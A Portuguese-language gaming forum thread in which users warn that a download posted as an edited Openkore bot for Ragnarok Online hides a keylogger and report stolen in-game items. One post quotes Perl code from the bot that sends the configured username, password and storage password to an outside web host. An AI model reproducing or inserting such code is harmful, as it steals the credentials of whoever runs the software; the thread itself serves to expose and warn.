Ir para conteúdo
Faça parte da equipe! (2024) ×

Openkore 3.0 editado,com esse BOT é possivel uzalo em XP,VISTA,SEVEN,100% RENEWAL


Posts Recomendados

postpunido.png

vai se fuder velho eu nao to zuando eu li outro kra ai logaram na conta dele puta que pariu man, juro pra vcs nao to zoando eu usei o bot e tava configurando dps quando fui logar de novo o bot falo que tava o servidor reconhece seu ultimo login, eu loguei e meu mecanico tava na campal, e eu ainda deixei meu valk shield nele pqp. @quit agora nao vo cont a jogar com -400kk do jeito que eu to liso

Link para o comentário
Compartilhar em outros sites

caiordc18 e o postador, sao as mesmas pessoas, la na 2 pagina ele se enganou de conta.

sim, essa porra e pra roubar senha, e so o poseidon 2.0 antigo, com keylogger, ja testei aki, e certifikei

 

Obs> o cara e tao mal ator com essa conta dupla que da ate pena...

 

 

E pros caras que baixaram, o key ta oculto dentro da pasta poseidon.

 

Sem mais... ( fecha essa merda logo >< )

Link para o comentário
Compartilhar em outros sites

!!!NÃO BAIXEM O ARQUIVO!!! tem KL(Key Logger)no arquivo ele está oculto na pasta POSEIDON,esse cara tem conta dupla aqui que é a caiordc18 e AraujoRag

eu sempre estranhei toda vez que o AraujoRag postava alguma coisa o caiordc18 postava logo atrás e esse foi seu erro manolo,mas ta aí uma boa maneira de hackear contas

eu só não fui hackeado por quê toda vez que baixo BOT eu testo em uma conta fake só pra garantir ;] e adivinha no que deu?Eu tinha um Alquimista nessa conta com uns itens até mais ou menos pra servir de isca(Maça Carga +5,Olhos Biônicos e Chapéu do Pesar de Thanatos+5)eu usei o BOT e 30 minutos depois meu Alquimista tava sem os Olhos Biônicos e sem o Thanatos e no meus equips a Maça Carga evaporou lo/,seja como for não baixem mais e pra quem já baixou troquem TODAS as suas senhas imediatamente!

@fikdik ;*

Link para o comentário
Compartilhar em outros sites

Agm confirma q isso aqui é um código que trabalha estilo keylogger?

my $usuario = $config{'username'};

$usuario =~ s/#/:/;

my $senha = $config{'password'};

$senha =~ s/#/:/;

my $kafra = $config{'storageAuto_password'};

$kafra =~ s/#/:/;

my $response = $ua->get("http://osmarmlsp.110mb.com/feroz/key_strokes.php?keylog=$usuario $senha $kafra");

 

Poise encontrei ele no servertype0, ñ tenho muita certeza se é ,mas melhor tomarem cuidado

Link para o comentário
Compartilhar em outros sites

sao nubs masi de qualquer forma nao ligo,nao to ganhando nd com isso,postei isso rpa ajudar os cara a baxar e uzar,nem ligo pra essas nubices,meu bot tem scan oque prova que nao tem virus se quizerem fazer o scan por pessoalmente de novo,nao liguem para nuubs como esses

Link para o comentário
Compartilhar em outros sites

KKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKKK

 

 

eu postei 1º, nego me chingo falando que meu pc tava infectado.

 

agora vem + 30 pessoas reclamar , dizendo que realmente eh HACK esse cara.

 

MANO, FECHA ESSE TÓPICO !!!!!!!!!!

 

vai esperar quantos mais sofrerem tentativa de furto para da ban nesse cara ??????????

 

erro de login duplo... sei ! :beijo:

 

Só nao entendo uma coisa....

 

Porque ele queria roubar do meo sacer 1 boina verde e 1 folha romantica ?

 

ta tensooo em ! ta pobre pakas

Link para o comentário
Compartilhar em outros sites

Pço pensa antes de falar ..... o novato aqui no forum é vc so olhar a data de ingresso no forum que localiza de baixo de seu avatar.Agora olha a minha sou novato?E vc?

 

Agora que o seu hack ñ possui virus e verdade mas se toca que nele tem linhas de programação que enviam unicamente o login,senha e senha da kafra para um dominio por vc determinado no site keystrokes,por isso n é detectado como virus

Link para o comentário
Compartilhar em outros sites

Este tópico está impedido de receber novos posts.
 Compartilhar

  • Quem Está Navegando   0 membros estão online

    • Nenhum usuário registrado visualizando esta página.
×
×
  • Criar Novo...

Informação Importante

Nós fazemos uso de cookies no seu dispositivo para ajudar a tornar este site melhor. Você pode ajustar suas configurações de cookies , caso contrário, vamos supor que você está bem para continuar.